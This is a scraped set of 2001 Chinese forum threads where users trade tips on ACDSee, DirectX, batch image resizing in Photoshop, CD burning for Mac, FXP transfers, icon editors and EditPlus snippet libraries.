 发表于 2001-11-27 20:15:33 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
不行，我安装的最新的DirectX8，可是它说DirectDraw，叫我更新！！！

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 20:17:54 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
找个directx卸载工具把它卸了
http://www8.pconline.com.cn/download/swdetail.phtml?id=15
装上面这个版本的~
你原来的版本有问题~ beta的~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：DirectDraw在那下载？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


为什么我装了acdsee4后还是无法查看ico文件？

计算机技术
为什么我装了acdsee4后还是无法查看ico文件？

上一贴 | 下一贴
发表人 主题: 为什么我装了acdsee4后还是无法查看ico文件？
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-26 22:20:35 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
如题。

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-26 22:26:21 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
AS4我没用过,不清楚~推荐你装IrfanView32,只有几百K,功能不弱~
蓝岭飞鸟

初级用户
积分：74
发帖：18
来自：
注册：2001-11-26
 发表于 2001-11-27 05:23:48 按此观看蓝岭飞鸟的个人资料 按此发邮件给蓝岭飞鸟 发送悄悄话给蓝岭飞鸟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝岭飞鸟的IP
3.x就可以看了，到插件里面把ico的对勾打上。默认的是不能看的
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-27 09:23:25 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
蓝岭飞鸟在上个帖子中说
引用:
3.x就可以看了，到插件里面把ico的对勾打上。默认的是不能看的

已经勾了。还是不行。

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-27 09:26:30 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
小诺在上个帖子中说
引用:
AS4我没用过,不清楚~推荐你装IrfanView32,只有几百K,功能不弱~
〕

小诺说的这个东东可以显示图标，可不知为什么每个图标显示前要出来一个对话框设定这个图标的尺寸及色深。而且还没有批量设定的功能。我这里可有几百个图标啊！ Faint～～～

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 09:58:01 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
acdsee可以看icon的～ 预览icon的话win2000直接能预览icon查看缩略图就行 要acdsee具有更强大功能 请安装directx8 直接支持视频和swf 还有声音编辑

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-27 18:49:29 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
新版的ACDSEE有BUG，浏览ICO文件就显示模板损坏，至少我的机子是这样

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
上一贴 | 下一贴
快速回复 | 主题：为什么我装了acdsee4后还是无法查看ico文件？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何用Acdsee批量转换图片（主要是大小）

计算机技术
如何用Acdsee批量转换图片（主要是大小）

上一贴 | 下一贴
发表人 主题: 如何用Acdsee批量转换图片（主要是大小）
zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-11-24 20:17:19 按此观看zy2003的个人资料 按此发邮件给zy2003 收藏该主题供以后查看 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
我知道很简单，但是具体步骤是怎样的呢？
还有转换后的文件名跟原文件事什么关系？
请指教

[img]http://51abc.net/banner/banner2.gif[/img]
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-24 20:22:35 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
哈哈，首先选中你要处理的文件，用SHIFT和CTRL辅助，然后批量有很多功能，可以改变文件名、将一种文件转换成另一种文件等等，呵呵，自己发掘吧，在图片上点击右键即有快捷菜单

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-11-24 20:23:35 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
用PS很方便啊，先改变一幅图片的大小，再复制行为

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-11-24 20:28:45 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
天外飞猪，我说主要是大小啊，你怎么没说到重点？让我自己发掘？？！
DW5大哥，是批量喔，虽然action可以重复同一个动作，但也得一个个把文件打开吧。唉-----------------

[img]http://51abc.net/banner/banner2.gif[/img]
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-24 23:02:57 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
ACDSEE我用的比较多的，但是我没注意到是否能改变大小，我拿它主要就是转换图片格式和文件名的，反正当图片格式被改时，他的大小也就改了，呵呵

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
hanhui

高级用户
积分：218
发帖：112
来自：浙江
注册：2000-07-22
 发表于 2001-11-24 23:32:00 按此观看hanhui的个人资料 按此发邮件给hanhui 访问hanhui的主页 hanhui 的 oicq 是442666,查看 442666 的资料 发送悄悄话给hanhui 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hanhui的IP
选中你要改变的图后在plug-in里选HTML ALBUM GENERATOR后让它帮你生成HTML文件及缩略图！你自己定义那缩略图的大小不就可以批量改变大小了么！

————————————————————
欢迎光临中国美术学院校内热门的艺术论坛
http://www.firechina.com/index.asp
————————————————————
zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-11-25 09:36:08 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
天外飞猪,呵呵，我说的大小是指尺寸，可不是说体积，不管怎样，谢谢你了
也谢谢hanhui，我也刚找到这方面的资料，不过好像不太好用
因为它改变的大小是按比例的，并不能完全符合指定的尺寸，（比例不相等时，只能有一项符合，宽或者是高）
这样批量转化出来的图片就不会是同样大小的尺寸了

[img]http://51abc.net/banner/banner2.gif[/img]
hanhui

高级用户
积分：218
发帖：112
来自：浙江
注册：2000-07-22
 发表于 2001-11-25 11:55:12 按此观看hanhui的个人资料 按此发邮件给hanhui 访问hanhui的主页 hanhui 的 oicq 是442666,查看 442666 的资料 发送悄悄话给hanhui 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hanhui的IP
你弄错了吧！那做的时候是通过设置长和宽的像素大小来决定的啊！你好好试试就知道了！！

————————————————————
欢迎光临中国美术学院校内热门的艺术论坛
http://www.firechina.com/index.asp
————————————————————
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-25 14:02:00 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
我倒是建议使用“Image Optimizer”，尺寸大小可以随意更改（不过不成比例会变形），最好的是文件减肥，还可以加水印加标志……

我经常处理数码相片（文件大的不得了），每次几十几百张，用它省心，文件名处理后不会更改，所以建议使用新路径

[这消息被BIGBUG编辑过(编辑时间2001-11-25 14:02:10)]

等我想想再签
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-25 16:01:47 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
先选中要处理的图片，调用acdsee里的HTML像册生成器（插件里），看到最上面的缩略图选项了吗，嘿嘿，剩下的就不用我说了吧

不过如果你装有fw的话，建议你还是用fw的批处理来做，可选项更多，而且生成图片的质量比acdsee的好，批处理的脚本还可以保存以备下次使用。

缘是天定,份在人为.
zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-11-26 13:49:45 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
hanhui在上个帖子中说
引用:
你弄错了吧！那做的时候是通过设置长和宽的像素大小来决定的啊！你好好试试就知道了！！

我试了阿，它是让指定像素，但比例不同的话最后还是只有一项相符

to嘿嘿:用fw怎么操作，可以说说吗？

[img]http://51abc.net/banner/banner2.gif[/img]
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-26 15:09:38 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
zy2003在上个帖子中说
引用:
to嘿嘿:用fw怎么操作，可以说说吗？

我替你搜了一下，关于fw批处理的一共42个记录，这里的资源很丰富的，养成搜索的好习惯真的可以帮你很多忙

这是其中一条，希望对你有帮助
http://www.blueidea.com/bbs/newsdetail.asp?id=96769

缘是天定,份在人为.
zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-11-26 20:15:29 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
嘿嘿，你的积分好低，竟敢教训我，嘿嘿..

[img]http://51abc.net/banner/banner2.gif[/img]
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-26 22:28:39 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
http://www.blueidea.com/bbs/newsdetail.asp?id=207085
zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-11-27 13:22:50 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
嘿嘿，你浑身上下没有半只幽默细胞

小诺指点的页面不错，原来ps也有批量处理功能，我竟不知道在哪
待我到ps版问问，走喽..

[img]http://51abc.net/banner/banner2.gif[/img]
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 14:14:55 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
zy2003在上个帖子中说
引用:
嘿嘿，你浑身上下没有半只幽默细胞

小诺指点的页面不错，原来ps也有批量处理功能，我竟不知道在哪
待我到ps版问问，走喽..

photoshop 的web photoshop功能

点击 File - Automate - Web Photo Gallery 菜单－－甚至从这个菜单项的名字就可以知道它的功能。
点击 Files 栏 Source 右侧的 Choose... 按钮可以指定图片库存放的路径。
Include All Subdirectories 意味着指定文件夹的子文件夹中的图片也将被处理。
Destination 右侧的 Choose... 按钮被用来指定处理后的图片、缩略图及网页存放的位置，你必须为它指定一个恰当的文件夹。
Site 栏中有一些关于即将生成的网页的选项：Site Name （网页标题）、Photographer （作者）和 Date （日期）。你可以有选择地填写它们。
Thumbnail 栏是关于生成的缩略图的设置，你可以使用 Small 、Medium、Large 三种不同的 Size 值。Use Filename As Caption 是说在生成的网页上用相应图像的文件名作为缩略图的标注。

Resize Gallery Images 是一个复选框，你可以取消对它的选择，这样 Photoshop 不会对图像的尺寸和质量作任何改动。而选中 Resize Gallery Images 后，Photoshop 会把原来的图像压缩后用 JPG 格式保存－－你可以在这里设置压缩后的 Size （尺寸）及 Quality（质量）。

按下 OK 按钮后，Photoshop 会依次打开指定源文件夹中的每一个图片，对它进行压缩并生成缩略图，它们将被分别保存到你事先通过 Destination 参数指定的目标文件夹中 Image 和 Thumbnail 子目录中。如果你的素材库中图片相当多，这个处理的过程可能需要相当长的一段时间，你可以耐心地等待 Photoshop 完成处理或者按 ESC 中止处理。

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

草原风

初级用户
积分：123
发帖：54
来自：
注册：2001-08-27
 发表于 2001-11-27 15:11:46 按此观看草原风的个人资料 按此发邮件给草原风 访问草原风的主页 草原风 的 oicq 是77704582,查看 77704582 的资料 发送悄悄话给草原风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看草原风的IP
呵呵，终于有人给解决了这个小儿科的问题了，我说嘛怎么看了半天也没有人说到正点上，呵呵，PS的批处理功能是最为方便省事的了，大家好好发掘一下它的功能吧

[img]http://aougu.com/bbs/upload/forum23_f_40_1007022940.gif[/img]俺要当水区的版主呀，谁来救俺
上一贴 | 下一贴
快速回复 | 主题：如何用Acdsee批量转换图片（主要是大小）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


急死我了~~ pc刻mac格式的光盘~ 该怎么办?

计算机技术
急死我了~~ pc刻mac格式的光盘~ 该怎么办?

上一贴 | 下一贴
发表人 | 主题: 急死我了~~ pc刻mac格式的光盘~ 该怎么办?
every78924 终级用户 积分：1359 发帖：605 来自：beijing 注册：2001-07-30 | 发表于 2001-11-19 17:31:05 按此观看every78924的个人资料 按此发邮件给every78924 访问every78924的主页 every78924 的 oicq 是123713521,查看 123713521 的资料 收藏该主题供以后查看 发送悄悄话给every78924 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看every78924的IP 老大~ 能用Easy CD creator 5刻pc格式的 但是mac不能读 请问我该怎么办 (非常着急) 还有就是用我先格式化光盘再把需要的拖过去这样刻每问题 但是要用Easy CD creator 5里的第4项刻 刻到98%就再也不动了 为什么 [ Every 78924 ]
quester 鼠标说话 是个版主 积分：2604 发帖：1175 来自：GTA 注册：2000-08-28 | 发表于 2001-11-19 23:25:00 按此观看quester的个人资料 按此发邮件给quester 发送悄悄话给quester 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看quester的IP 使用 数据CD 来刻， 文件格式选用 ISO9660， 盘片采用单轨道模式刻录，就可在任何地方都读得出来，不分平台。（注意，转换ISO9660后，长文件名会改短，如果有Autorun引用，就出问题了！） 下载 ColorKey 试用版 解决配色问题 逢对手鼠标说话，仗一键快意恩仇！ ...乍暖還寒時候，最難將息... Blueidea Web Team Moderator of Art & Design
软硬兼施 终级用户 积分：465 发帖：295 来自：net 注册：2001-08-03 | 发表于 2001-11-19 23:28:59 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP 要装个那种软件把~~~~~~ ^^
quester 鼠标说话 是个版主 积分：2604 发帖：1175 来自：GTA 注册：2000-08-28 | 发表于 2001-11-20 06:25:16 按此观看quester的个人资料 按此发邮件给quester 发送悄悄话给quester 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看quester的IP No! just in Easy CD or Neon or CD maker ! 下载 ColorKey 试用版 解决配色问题 逢对手鼠标说话，仗一键快意恩仇！ ...乍暖還寒時候，最難將息... Blueidea Web Team Moderator of Art & Design
every78924 终级用户 积分：1359 发帖：605 来自：beijing 注册：2001-07-30 | 发表于 2001-11-20 11:47:42 按此观看every78924的个人资料 按此发邮件给every78924 访问every78924的主页 every78924 的 oicq 是123713521,查看 123713521 的资料 发送悄悄话给every78924 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看every78924的IP 再那选文件格式 啊 找了好久了 没有啊 详细告诉我一下好不好啊~ 一步一步的 我很急. 谢了 [ Every 78924 ]
every78924 终级用户 积分：1359 发帖：605 来自：beijing 注册：2001-07-30 | 发表于 2001-11-20 12:36:00 按此观看every78924的个人资料 按此发邮件给every78924 访问every78924的主页 every78924 的 oicq 是123713521,查看 123713521 的资料 发送悄悄话给every78924 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看every78924的IP 终于可以了~ 用NERO5.551很简单的就解决了 谢谢大家~ 强烈建议使用NERO5.551刻录光盘。 [ Every 78924 ]
上一贴 | 下一贴
快速回复 | 主题：急死我了~~ pc刻mac格式的光盘~ 该怎么办?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


哪个FTP软件可以在两个站点之间传送

计算机技术
哪个FTP软件可以在两个站点之间传送

上一贴 | 下一贴
发表人 | 主题: 哪个FTP软件可以在两个站点之间传送
CrazyParty 群山之巅 积分：2164 发帖：811 来自：温州 注册：2000-10-14 | 发表于 2001-11-23 14:22:57 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP 我用windows commander自带的FTP，但速度很慢。 这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
嘿嘿 坏笑 积分：403 发帖：524 来自： 注册：2001-10-06 | 发表于 2001-11-23 17:19:52 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP 我也想一个可以把一个空间里的主页传到另一个主页空间里的ftp软件，可惜找了很久都没找着，谁知道，推荐一下吧 缘是天定,份在人为.
小诺 替补版主 积分：6499 发帖：3746 来自：Shanghai 注册：2000-09-16 | 发表于 2001-11-23 17:24:01 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP http://newhua.infosail.com/FLASHFXP.HTM
2smile 活着就好 积分：1622 发帖：1907 来自：SD 注册：2001-05-13 | 发表于 2001-11-23 18:03:57 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP 不过好像要两个站点都支持fxp才可以。 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
webhuman 出发 积分：3157 发帖：1513 来自：打死也不说^0^ 注册：2000-06-17 | 发表于 2001-11-23 18:25:09 按此观看webhuman的个人资料 按此发邮件给webhuman 访问webhuman的主页 webhuman 的 oicq 是1726927,查看 1726927 的资料 发送悄悄话给webhuman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看webhuman的IP 使用cuteftp就可以，打开两个窗口，分别连接不同的服务器，直接拖拽过去即可。，如果成功的话，会在下面的状态条显示，正在进行点对点传递。速度非常快。我曾经这样传过2M一个数据库，也就几秒钟就搞定了。 当然这样看你的服务其实不是支持了。 无论到了何种境地，都要守住心里头的那一点东西，一个神圣的居于心的正中的原则，既爱生命的意志。 ------摩罗
上一贴 | 下一贴
快速回复 | 主题：哪个FTP软件可以在两个站点之间传送
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


做专业的ICON用什么软件比较好呢？

计算机技术
做专业的ICON用什么软件比较好呢？

上一贴 | 下一贴
发表人 | 主题: 做专业的ICON用什么软件比较好呢？
shily 初级用户 积分：3 发帖：2 来自： 注册：2001-10-14 | 发表于 2001-11-19 13:29:40 按此观看shily的个人资料 按此发邮件给shily 访问shily的主页 收藏该主题供以后查看 发送悄悄话给shily 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看shily的IP 请教
银衣 超级用户 积分：423 发帖：291 来自：mooncity 注册：2001-06-23 | 发表于 2001-11-19 14:32:00 按此观看银衣的个人资料 按此发邮件给银衣 银衣 的 oicq 是35538919,查看 35538919 的资料 发送悄悄话给银衣 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看银衣的IP Axialis AX-Icons 青山隐隐水迢迢 秋近江南草未凋 二十四桥明月夜 玉人何处教吹萧
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-11-19 15:04:20 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP Articons A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
MOP 拖把一族 积分：1263 发帖：854 来自：垃圾箱 注册：2001-09-28 | 发表于 2001-11-19 16:54:50 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP Articons,很好的~ --------------------------------------------- + MOP FAMILY + =Blueidea=MOP
shily 初级用户 积分：3 发帖：2 来自： 注册：2001-10-14 | 发表于 2001-11-19 21:29:49 按此观看shily的个人资料 按此发邮件给shily 访问shily的主页 发送悄悄话给shily 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看shily的IP 多谢各位前辈
上一贴 | 下一贴
快速回复 | 主题：做专业的ICON用什么软件比较好呢？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


用editplus自己动手做资料扩展库

计算机技术
用editplus自己动手做资料扩展库

上一贴 | 下一贴
发表人 主题: 用editplus自己动手做资料扩展库
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-15 12:23:44 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 收藏该主题供以后查看 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
经常在网上看到很多javascript 和Dhtml的各类效果 每次收集下来的东西时间一长自己找起来也麻烦,刚想到有个方法可以解决这个问题,就是利用editplus的扩充功能自己动手制作收集了各类效果的资料库.

1.先去下载这个软件吧~http://www.editplus.com/download.html (1M大小)

2.安装后打开看到editplus的软件界面,从界面上看它是一个普通的编辑类软件但它的功能是很全的~支持多种文件格式的语法显亮,直接调用浏览器预览制作的页面等,这里先不说这些,安装后自己感觉吧~

3.先看看要做的扩展文件是什么样子的有什么作用~
打开view菜单下Toolbars/views下Directory Windows(如图1) 或者用快捷键Alt+Shift+3

现在看到左边的列表项 选择其中的Cliptext(如图2)

在列表中看到默认安装后已经存在的六个分类.(如图3)

其中HTML3.2中有我新增的一个项"通过连接关闭窗口" 用鼠标双击这个项就会自动添加右边的内容"<a href="" onClick="window.close(self)">Close Window</a>" (如图4)

3.通过EDITPLUS方便的扩充功能我们完全可以建立属于自己的代码库.下面进入我们的主题吧~
Editplus的扩展文件在就在它的安装目录下面有多种扩展文件类型,今天我们要用到的就是其中的一个CTL文件,

用普通文本编辑工具如记事本或者直接就用editplus就能制作CTL文件.

4.制作CTL文件,例:用记事本编写CTL文件

记事本编写的内容如下:

#TITLE=资料库_1
#INFO
Written By Yunbin
#SORT=n

#T=通过连接关闭窗口
<a href="" onClick="window.close(self)">Close Window</a>

其中#TITLE=资料库_1 定义以后在列表中的名称 #INFO包含的内容一般是一些制作者的信息 #SORT=n 定义制作的列表的排列方式 默认是按name排列 #T=通过连接关闭窗口 定义列表中调用内容的名称 关键就在这里你可以尽管往里面加内容 如:

#T=通过连接关闭窗口
<a href="" onClick="window.close(self)">Close Window</a>

#T=通过按钮关闭窗口
<FORM><INPUT TYPE="BUTTON" VALUE="Close Window" onClick="window.close(self)">
</FORM>

#T 定义的每一个项都会在列表中显示 (如图5 -有上面两项内容)

另外还有方法增加资料项就是定义好文件的基本部分后#T 部分不在文件中手写添加,而在editplus中用它自己的扩展功能添加进去方法如下
在列表框范围点鼠标右键则看到一个菜单有Add 一项 (如图6)

